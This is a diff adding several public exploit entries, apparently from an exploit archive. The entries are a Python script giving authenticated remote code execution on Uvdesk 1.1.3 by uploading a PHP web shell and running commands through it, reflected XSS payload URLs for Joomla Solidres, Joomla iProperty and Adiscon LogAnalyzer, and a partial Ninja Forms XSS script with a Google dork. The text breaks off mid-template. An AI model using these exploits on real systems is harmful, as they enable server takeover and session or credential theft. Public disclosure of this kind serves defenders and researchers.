+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14 + +https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS] + +https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS] + +https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS] + +https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11 + +https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14 + + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51639.py b/exploits/php/webapps/51639.py new file mode 100755 index 0000000000..887441b126 --- /dev/null +++ b/exploits/php/webapps/51639.py @@ -0,0 +1,54 @@ +# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated) +# Date: 28/07/2023 +# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security +# Vendor Homepage: https://www.uvdesk.com +# Software Link: https://github.com/uvdesk/community-skeleton +# Version: 1.1.3 +# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami" +# CVE : CVE-2023-39147 +# Tested on: Ubuntu 20.04.6 + + +import requests +import argparse + +def get_args(): + parser = argparse.ArgumentParser() + parser.add_argument('-u', '--url', required=True, action='store', help='Target url') + parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') + my_args = parser.parse_args() + return my_args + +def main(): + args = get_args() + base_url = args.url + + command = args.command + uploaded_file = "shell.php" + url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command + +# Edit your credentials here + login_data = { + "_username": "admin@adm.com", + "_password": "passwd", + "_remember_me": "off" + } + + files = { + "name": (None, "pwn"), + "description": (None, "xxt"), + "visibility": (None, "public"), + "solutionImage": (uploaded_file, "", "image/jpg") + } + + s = requests.session() + # Login + s.post(base_url + "/en/member/login", data=login_data) + # Upload + upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files) + # Execute command + cmd = s.get(url_cmd) + print(cmd.text) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51640.txt b/exploits/php/webapps/51640.txt new file mode 100644 index 0000000000..68308161c3 --- /dev/null +++ b/exploits/php/webapps/51640.txt @@ -0,0 +1,36 @@ +# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 29/07/2023 +# Vendor: The Thinkery LLC +# Vendor Homepage: http://thethinkery.net +# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/ +# Demo: https://iproperty.thethinkery.net/ +# Version: 4.1.1 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + + +Path: /iproperty/property-views/all-properties-with-map + +GET parameter 'filter_keyword' is vulnerable to XSS + +https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1 + + +XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4 + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51643.txt b/exploits/php/webapps/51643.txt new file mode 100644 index 0000000000..f509b89179 --- /dev/null +++ b/exploits/php/webapps/51643.txt @@ -0,0 +1,24 @@ +# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting +# Date: 2023.Aug.01 +# Exploit Author: Pedro (ISSDU TW) +# Vendor Homepage: https://loganalyzer.adiscon.com/ +# Software Link: https://loganalyzer.adiscon.com/download/ +# Version: v4.1.13 and before +# Tested on: Linux +# CVE : CVE-2023-36306 + +There are several installation method. +If you installed without database(File-Based),No need to login. +If you installed with database, You should login with Read Only User(at least) + +XSS Payloads are as below: + +XSS +http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E +http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123 +http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E +http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E \ No newline at end of file diff --git a/exploits/php/webapps/51644.py b/exploits/php/webapps/51644.py new file mode 100755 index 0000000000..f4fdda4872 --- /dev/null +++ b/exploits/php/webapps/51644.py @@ -0,0 +1,158 @@ +# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) +# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt +# Date: 2023-07-27 +# Exploit Author: Mehran Seifalinia +# Vendor Homepage: https://ninjaforms.com/ +# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip +# Version: 3.6.25 +# Tested on: Windows 10 +# CVE: CVE-2023-37979 + +from requests import get +from sys import argv +from os import getcwd +import webbrowser +from time import sleep + + +# Values: +url = argv[-1] +if url[-1] == "/": + url = url.rstrip("/") + +# Constants +CVE_NAME = "CVE-2023-37979" +VULNERABLE_VERSION = "3.6.25" + + # HTML template +HTML_TEMPLATE = f""" + + + + {CVE_NAME} + + + +

+ Ninja-forms reflected XSS ({CVE_NAME})
+ Created by Mehran Seifalinia +
+
+
+ + + + + + " /> + +
+
+
After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.
+